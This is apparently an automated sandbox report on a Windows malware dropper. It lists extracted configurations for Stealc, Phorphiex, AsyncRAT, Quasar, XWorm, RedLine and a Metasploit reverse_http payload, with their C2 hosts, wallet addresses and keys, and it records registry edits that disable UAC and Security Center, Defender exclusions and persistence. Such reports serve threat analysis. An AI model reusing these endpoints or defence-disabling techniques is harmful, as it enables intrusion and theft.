Resubmissions
15-11-2024 19:06
241115-xr6q5szdnf 1014-11-2024 23:35
241114-3lfknavfqg 1014-11-2024 23:26
241114-3eysnavfje 1014-11-2024 23:12
241114-26znlavdqq 10Analysis
-
max time kernel
266s -
max time network
270s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-11-2024 19:06
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
stealc
bbb7
http://213.109.147.66
-
url_path
/73de3362ad1122cd.php
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3BiS1jaRpWtkqtfZGp9f1rXXts5DyUkaBX
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
0t6rv5xwbh
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
8TdjLZxCzOjI
-
delay
3
-
install
true
-
install_file
client.exe
-
install_folder
%AppData%
Extracted
metasploit
windows/reverse_http
http://89.197.154.116:7810/mkz1k28a5hVWXldfMKSuWQDmK7fiEd5xuDSo_iL2psuWuGxHGmOnGPc6Ycs357XSfevzTTr7C2_5P
Extracted
quasar
1.4.0
Office04
192.168.31.99:4782
2001:4bc9:1f98:a4e::676:4782
255.255.255.0:4782
fe80::cabf:4cff:fe84:9572%17:4782
1f65a787-81b8-4955-95e4-b7751e10cd50
-
encryption_key
A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9
-
install_name
Java Updater.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Java Updater
-
subdirectory
SubDir
Extracted
xworm
mylogsprvt.zapto.org:8899
157.66.26.208:8848
SmH2L0949LC6zVSS
-
install_file
USB.exe
Extracted
redline
newest
mylogsprvt.zapto.org:45630
Extracted
quasar
1.4.1
Java
dez345-37245.portmap.host:37245
f0e53bcd-851e-44af-8fd5-07d8ab5ed968
-
encryption_key
65439CE7DEF3E0FAF01C526FEA90388C9FD487A1
-
install_name
java.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java ©
-
subdirectory
Programfiles
Signatures
-
Asyncrat family
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/2240-6082-0x0000000000DD0000-0x0000000000DE2000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe family_xworm behavioral1/memory/5612-6946-0x00000000001A0000-0x00000000001B2000-memory.dmp family_xworm behavioral1/memory/3140-7471-0x0000000000F90000-0x0000000000FE6000-memory.dmp family_xworm -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe zharkcore -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies security service 2 TTPs 2 IoCs
Processes:
sysklnorbcv.exesysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysppvrdnvs.exe -
Phorphiex family
-
Phorphiex payload 3 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Files\1.exe family_phorphiex \Users\Admin\AppData\Local\Temp\Files\newtpp.exe family_phorphiex \Users\Admin\AppData\Local\Temp\Files\tpeinf.exe family_phorphiex -
Quasar family
-
Quasar payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1216-5513-0x0000000000D40000-0x0000000000DC4000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe family_quasar behavioral1/memory/3344-5541-0x0000000000890000-0x0000000000914000-memory.dmp family_quasar behavioral1/memory/4400-6161-0x0000000000BD0000-0x0000000000F1E000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Programfiles\java.exe family_quasar behavioral1/memory/4184-6171-0x0000000000D00000-0x000000000104E000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1584-6092-0x0000000001070000-0x000000000108E000-memory.dmp family_redline behavioral1/memory/3172-7515-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1584-6092-0x0000000001070000-0x000000000108E000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
1658518264.exewinupsecvmgr.exedescription pid process target process PID 3820 created 1208 3820 1658518264.exe Explorer.EXE PID 3820 created 1208 3820 1658518264.exe Explorer.EXE PID 4516 created 1208 4516 winupsecvmgr.exe Explorer.EXE PID 4516 created 1208 4516 winupsecvmgr.exe Explorer.EXE PID 4516 created 1208 4516 winupsecvmgr.exe Explorer.EXE -
Processes:
reg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Processes:
sysppvrdnvs.exesysklnorbcv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe -
Xworm family
-
Zharkbot family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3064 powershell.exe 2572 powershell.exe 2304 powershell.exe 4176 powershell.exe 3928 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 4540 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Drops startup file 4 IoCs
Processes:
conhost.exeservice.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe conhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe conhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe service.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe service.exe -
Executes dropped EXE 64 IoCs
Processes:
pimer_bbbcontents7.exeSession-https.exepimer_bbbcontents7.exe1.exeuniv.exesysklnorbcv.exeArmanivenntii_crypted_EASY.exenewtpp.exeTerminal_9235.exetpeinf.exetn8cdkzn.exesysnldcvmr.exesysppvrdnvs.execlient.exePrototype.exeneonn.exe%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exesvchost.exeDeliciousPart.exeFaced.pifIdentifications.exechina.exeRegAsm.exe286830899.exeneon.exeneon.exe617623040.exe123264690.exe1423223895.exe781431589.exeaaa.exespectrum.exeMeeting.exeExplorer.EXEIcon.exe444.exeJava Updater.exe104116141.exe1628723224.execonhost.exe1658518264.exewinupsecvmgr.exe1146015314.exeout.exepi.exeDocuments.exeohtie89k.exeservice.exewindows.execrypted_c360a5b7.exeup.exejeditor.exeJava32.exeUnit.exejava.execrypted.exedropper64.exeWEBDOWN.EXE1418522541.exeservice.exe2993410356.exe775131445.exe2350019260.exepornhub_downloader.exepid process 2644 pimer_bbbcontents7.exe 2532 Session-https.exe 2020 pimer_bbbcontents7.exe 1676 1.exe 1816 univ.exe 1756 sysklnorbcv.exe 2036 Armanivenntii_crypted_EASY.exe 2948 newtpp.exe 2516 Terminal_9235.exe 1616 tpeinf.exe 1712 tn8cdkzn.exe 2796 sysnldcvmr.exe 2104 sysppvrdnvs.exe 2284 client.exe 376 Prototype.exe 1364 neonn.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 5380 svchost.exe 5640 DeliciousPart.exe 5984 Faced.pif 3188 Identifications.exe 1636 china.exe 3572 RegAsm.exe 4452 286830899.exe 4788 neon.exe 4860 neon.exe 4040 617623040.exe 2076 123264690.exe 2692 1423223895.exe 1452 781431589.exe 2140 aaa.exe 1216 spectrum.exe 1616 Meeting.exe 1208 Explorer.EXE 1684 Icon.exe 3128 444.exe 3344 Java Updater.exe 3620 104116141.exe 3644 1628723224.exe 3724 conhost.exe 3820 1658518264.exe 4516 winupsecvmgr.exe 2160 1146015314.exe 1156 out.exe 4560 pi.exe 1732 Documents.exe 2428 ohtie89k.exe 2240 service.exe 1584 windows.exe 2268 crypted_c360a5b7.exe 3320 up.exe 4252 jeditor.exe 4400 Java32.exe 4372 Unit.exe 4184 java.exe 4420 crypted.exe 4708 dropper64.exe 2236 WEBDOWN.EXE 2376 1418522541.exe 5612 service.exe 3516 2993410356.exe 4188 775131445.exe 3608 2350019260.exe 1976 pornhub_downloader.exe -
Loads dropped DLL 64 IoCs
Processes:
4363463463464363463463463.exepimer_bbbcontents7.exeArmanivenntii_crypted_EASY.execmd.exe%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exeDeliciousPart.execmd.exechina.exeFaced.pifsysppvrdnvs.exeneonn.exeneon.exesysklnorbcv.exe444.exe1423223895.exetaskeng.exepid process 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2644 pimer_bbbcontents7.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2036 Armanivenntii_crypted_EASY.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2164 cmd.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 2432 4363463463464363463463463.exe 5400 2432 4363463463464363463463463.exe 5640 DeliciousPart.exe 5788 cmd.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 1636 china.exe 5984 Faced.pif 2104 sysppvrdnvs.exe 1364 neonn.exe 4788 neon.exe 2104 sysppvrdnvs.exe 1756 sysklnorbcv.exe 2104 sysppvrdnvs.exe 1756 sysklnorbcv.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2104 sysppvrdnvs.exe 1756 sysklnorbcv.exe 3128 444.exe 2692 1423223895.exe 4456 taskeng.exe 1756 sysklnorbcv.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe 2432 4363463463464363463463463.exe -
Processes:
sysppvrdnvs.exesysklnorbcv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
service.exedropper64.exe1.exetpeinf.exenewtpp.exereg.execonhost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Roaming\\service.exe" service.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2DE76586F58A3604296297\\2DE76586F58A3604296297.exe" dropper64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" tpeinf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" newtpp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\neon = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\neon.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .." conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .." conhost.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
minesweeper.exedescription ioc process File opened for modification C:\Users\Admin\Saved Games\Microsoft Games\desktop.ini minesweeper.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
conhost.exedescription ioc process File created C:\autorun.inf conhost.exe File opened for modification C:\autorun.inf conhost.exe File created D:\autorun.inf conhost.exe File created F:\autorun.inf conhost.exe File opened for modification F:\autorun.inf conhost.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5816 tasklist.exe 5904 tasklist.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
pimer_bbbcontents7.exeneonn.exeInstallUtil.exewinupsecvmgr.execrypted.exedropper64.execock.exedescription pid process target process PID 2644 set thread context of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 1364 set thread context of 6044 1364 neonn.exe InstallUtil.exe PID 6044 set thread context of 5036 6044 InstallUtil.exe InstallUtil.exe PID 4516 set thread context of 2676 4516 winupsecvmgr.exe conhost.exe PID 4516 set thread context of 872 4516 winupsecvmgr.exe dwm.exe PID 4420 set thread context of 3448 4420 crypted.exe RegAsm.exe PID 4708 set thread context of 4776 4708 dropper64.exe svchost.exe PID 4708 set thread context of 4792 4708 dropper64.exe audiodg.exe PID 4708 set thread context of 4840 4708 dropper64.exe msiexec.exe PID 1364 set thread context of 2704 1364 neonn.exe InstallUtil.exe PID 3132 set thread context of 3172 3132 cock.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
china.exedescription ioc process File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\china.htm china.exe File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\china.jpg china.exe -
Drops file in Windows directory 11 IoCs
Processes:
newtpp.exeDeliciousPart.exe1.exetpeinf.exedescription ioc process File opened for modification C:\Windows\sysnldcvmr.exe newtpp.exe File opened for modification C:\Windows\BasedBrakes DeliciousPart.exe File opened for modification C:\Windows\ChapelSpoken DeliciousPart.exe File opened for modification C:\Windows\MotherboardLooking DeliciousPart.exe File opened for modification C:\Windows\CiscoHarder DeliciousPart.exe File opened for modification C:\Windows\sysklnorbcv.exe 1.exe File created C:\Windows\sysppvrdnvs.exe tpeinf.exe File opened for modification C:\Windows\sysppvrdnvs.exe tpeinf.exe File created C:\Windows\sysklnorbcv.exe 1.exe File created C:\Windows\sysnldcvmr.exe newtpp.exe File opened for modification C:\Windows\TypesCroatia DeliciousPart.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1104 sc.exe 1436 sc.exe 1960 sc.exe 1968 sc.exe 1752 sc.exe 2020 sc.exe 872 sc.exe 2216 sc.exe 2008 sc.exe 3008 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2652 2268 WerFault.exe crypted_c360a5b7.exe 4228 4372 WerFault.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
PING.EXEcmd.execmd.execonhost.exeIEXPLORE.EXEsc.exesc.exesc.execmd.exefindstr.exechina.execmd.execmd.exetasklist.execmd.exejeditor.exesc.exechoice.execrypted_c360a5b7.exeup.exeschtasks.exesc.exesc.exeInstallUtil.exeneon.exe1.execmd.exeInstallUtil.execrypted.exepornhub_downloader.execock.exesc.exesysnldcvmr.exe1423223895.exenewtpp.exereg.exesysppvrdnvs.exepowershell.exeIcon.exeUnit.exeInstallUtil.exepimer_bbbcontents7.exetpeinf.exesc.exeDeliciousPart.exefindstr.exeWEBDOWN.EXEPORNHU~1.EXE4363463463464363463463463.exepowershell.exetimeout.exeDocuments.execmd.exesc.exetasklist.exeuniv.execmd.exefindstr.exeneon.exeRegAsm.exeTerminal_9235.exeneonn.exeInstallUtil.exesc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language china.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jeditor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted_c360a5b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1423223895.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newtpp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Icon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Unit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pimer_bbbcontents7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpeinf.exe Key opened 